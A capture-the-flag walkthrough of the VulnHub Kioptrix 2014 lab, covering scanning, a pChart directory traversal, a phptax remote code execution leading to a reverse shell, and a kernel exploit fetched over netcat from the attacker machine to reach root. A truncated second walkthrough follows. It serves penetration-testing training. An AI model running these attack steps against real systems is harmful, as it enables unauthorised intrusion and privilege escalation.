VulnHub: Kioptrix: 2014-泓源视野

VulnHub: Kioptrix: 2014


  1. Network Discovery
nmap -sn

The target IP is

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2. Port scan

nmap -Pn

There’re 2 open ports: 80 and 8080.

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3. OS and service scan

nmap -A -p22,80,8080

There’re HTTP sites on both ports.

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4. Vuln scan

nmap --script vuln -p22,80,8080

Couldn't find any more useful information.

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5. Nikto scan

Port 80

nikto -h

This system may be vulnerable to a remote buffer overflow.

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Port 8080

nikto -h

The result was similar to port 80’s.

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6. Directory scan

Port 80

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u -x php,txt,html,sh,c
gi -q


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Port 8080

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u -x php,txt,html,sh,c
gi -q

I got a 403 return code.

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7. Exploit w/ mod_ssl

I came across this script.


Original is OpenFu*&%$#, I change for something more elegant This Exploit (…

From previous Nikto scan:

Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8

There’s no correct version in this script. I’ll have to try another way.

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8. Accessing HTTP site

Start w/ port 80

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View page source -> pChart2.1.3

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Accessing port 8080

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Viewing page source showed nothing

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Back to port 80, I googled pChart2.1.3. and came across the exploit-db site.

Offensive Security's Exploit Database Archive

Exploit Title: pChart 2.1.3 Directory Traversal and Reflected XSS # Date: 2014-01-24 # Exploit Author: Balazs Makany #…

Starting w/ Directory Traversal

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Test the exploit

Acces pChart, intercept request w/ Burp Suite, and send to the Repeater
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Test the exploit

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I don’t have permission to view this.

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Back to the site on port 8080, I suspected that it returned forbidden status (403) because I didn't have the right agent.

user-agent configuration is located in


Let’s try w/ the exploit


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After reading through the file, I found that user-agent was set to be Mozilla 4.0

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I used this list of agents


I used agent-switcher plugin w/ firefox and I can access the site.

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It’s phptax.

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Viewing page source revealed nothing

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Googling phptax exploit

Offensive Security's Exploit Database Archive

phptax 0.8 - Remote Code Execution. CVE-86992 . webapps exploit for PHP platform

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I will set up listener for reverse shell on port 1234


A list of useful payloads and bypass for Web Application Security and Pentest/CTF - swisskyrepo/PayloadsAllTheThings

I succeeded using this.

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Edit IP and encode to URL w/ Burp Suite

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Modified exploit string w/ encoded reverse shell command

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Paste it to the browser, now I have a shell

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9. Privilege escalation

Verify user


Seaching for password in:

/home, /tmp, /var/mail, /var/log

I couldn't find any usernames or passwords

Verify /etc/passwd permission

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Verify /etc/shadow permission

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Verify sudo

sudo -l
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Verify SUID

find / -perm -u=s -type f 2>/dev/null

Nothing that I can use.

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Verify capabilities

getcap -r / 2>/dev/null
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Verify cron

cat /etc/crontab

Nothing that I can use.

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Verify kernel

uname -a
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Googling up, I found 3 scripts.

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Tried the first script

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searchsploit -m 28718
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Prepare HTTP server at attacker machine

python -m SimpleHTTPServer 80
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Prepare to store at /tmp on target machine

cd /tmp

I don’t have get command.

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I’ll retrive w/ netcat instead.

On attacker machince

nc -nvlp 1337 < 28718.c
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On target machine

nc -nv 1337 > priv.c
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gcc priv.c -o priv
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Run the compiled script


Now I’m root.

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cd /root
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cat congrats.txt
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Mar 12


  1. Network Discovery
nmap -sn

The machine ‘’ is the target.

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2. Port scan

nmap -Pn -Pn -p1000-

There’re 4 ports: 22, 80, 139, 445.

Read more · 5 min read

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